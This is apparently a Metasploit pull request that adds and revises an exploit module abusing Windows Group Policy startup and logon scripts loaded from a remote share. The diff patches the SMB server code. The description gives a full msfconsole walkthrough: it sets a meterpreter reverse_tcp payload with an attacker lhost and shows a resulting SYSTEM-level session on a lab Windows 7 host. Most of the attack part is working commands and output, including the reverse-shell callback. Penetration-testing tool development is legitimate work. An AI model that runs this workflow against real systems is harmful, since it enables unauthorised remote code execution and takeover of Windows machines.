### PR TITLE
Solve #5092: Add module to exploit dangerous group policy startup scripts

### DIFF
--- a/lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb
+++ b/lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb
@@ -17,10 +17,17 @@ module Msf
             pkt = CONST::SMB_CREATE_PKT.make_struct
             pkt.from_s(buff)
 
-            payload = (pkt['Payload'].v['Payload']).downcase
-            payload.gsub!(/^[\x00]*/, '') # delete padding
-            payload = Rex::Text.ascii_safe_hex(payload)
-            payload.gsub!(/\\x([0-9a-f]{2})/i, '') # delete hex chars
+            payload = pkt['Payload'].v['Payload'].downcase
+
+            if pkt['Payload']['SMB'].v['Flags2'] & CONST::FLAGS2_UNICODE_STRINGS == CONST::FLAGS2_UNICODE_STRINGS
+              # If path length is odd first character is alignment
+              if payload.length.odd?
+                payload = payload[1..-1]
+              end
+              payload = Rex::Text.to_ascii(payload)
+            end
+
+            payload.gsub!(/[\x00]*/, '') # delete nulls
 
             if payload.nil? || payload.empty?
               payload = file_name

--- a/lib/msf/core/exploit/smb/server/share/information_level/find.rb
+++ b/lib/msf/core/exploit/smb/server/share/information_level/find.rb
@@ -58,7 +58,7 @@ module Msf
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_names_info(c, path)
-            if path && path.include?(file_name.downcase)
+            if path && path.ends_with?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
             elsif path && folder_name && path.ends_with?(folder_name.downcase)
               data = Rex::Text.to_unicode(path)

--- a/modules/exploits/windows/smb/group_policy_startup.rb
+++ b/modules/exploits/windows/smb/group_policy_startup.rb
@@ -12,13 +12,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'          => 'Group Policy Startup Script From Shared Resource',
+      'Name'          => 'Group Policy Script Execution From Shared Resource',
       'Description'   => %q{
         This is a general-purpose module for exploiting systems with Windows Group Policy
-        configured to load VBS startup scripts from remote locations. This module runs a
-        SMB shared resource that will provide a payload through an VBS file. The payload
-        will be executed with SYSTEM privileges on the target loading it through Windows
-        Group Policy. Have into account which the attacker still needs to the redirect the
+        configured to load VBS startup/logon scripts from remote locations. This module runs
+        a SMB shared resource that will provide a payload through a VBS file. Startup scripts
+        will be executed with SYSTEM privileges, while logon scripts will be executed with the
+        user privileges. Have into account which the attacker still needs to redirect the
         target traffic to the fake SMB share to exploit it successfully.
       },
       'Author'      =>
@@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
         {
           'EXITFUNC' => 'thread',
         },
-      'Privileged'     => true,
+      'Privileged'     => false,
       'Platform'       => 'win',
       'Arch'           => [ARCH_X86, ARCH_X86_64],
       'Payload'        =>

--- a/modules/exploits/windows/smb/group_policy_startup.rb
+++ b/modules/exploits/windows/smb/group_policy_startup.rb
@@ -63,8 +63,6 @@ class Metasploit3 < Msf::Exploit::Remote
   def setup
     super
     self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
-    exe = payload.encoded_exe
-    self.file_contents = Msf::Util::EXE.to_exe_vbs(exe)
     @custom_payloads = {}
     print_status("File available on #{unc}...")
   end


### PR DESCRIPTION
Provides module to fix #5092.

Instead of BadSamba uses `Msf::Exploit::Remote::SMB::Server::Share` to make it easy :)
## Verification
- [ ] Install Windows 7 SP1 (32 bit)
- [ ] Add a new GPO startup script. Setup as location the remote location where you will put the malicious file with msf (Ex: \172.16.158.1\test\test.vbs). How to add a new startup script: https://technet.microsoft.com/en-us/library/cc770556.aspx
- [ ] Run the new msf module with the SMB as you have configured the startup script:

```
msf > use exploit/windows/smb/group_policy_startup
msf exploit(group_policy_startup) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(group_policy_startup) > set FILE_NAME test.vbs
FILE_NAME => test.vbs
msf exploit(group_policy_startup) > set SHARE test
SHARE => test
msf exploit(group_policy_startup) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(group_policy_startup) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(group_policy_startup) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(group_policy_startup) > [*] File available on \\172.16.158.1\test\test.vbs...
[*] Server started.
```
- [ ] Restart the target system (win 7 sp1), log in, and wait a little. Shortly there should be a session on your msfconsole with SYSTEM privileges:

```
[*] Sending stage (880640 bytes) to 172.16.158.132
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.132:49257) at 2015-04-10 13:02:39 -0500

msf exploit(group_policy_startup) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.132 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(group_policy_startup) >
```
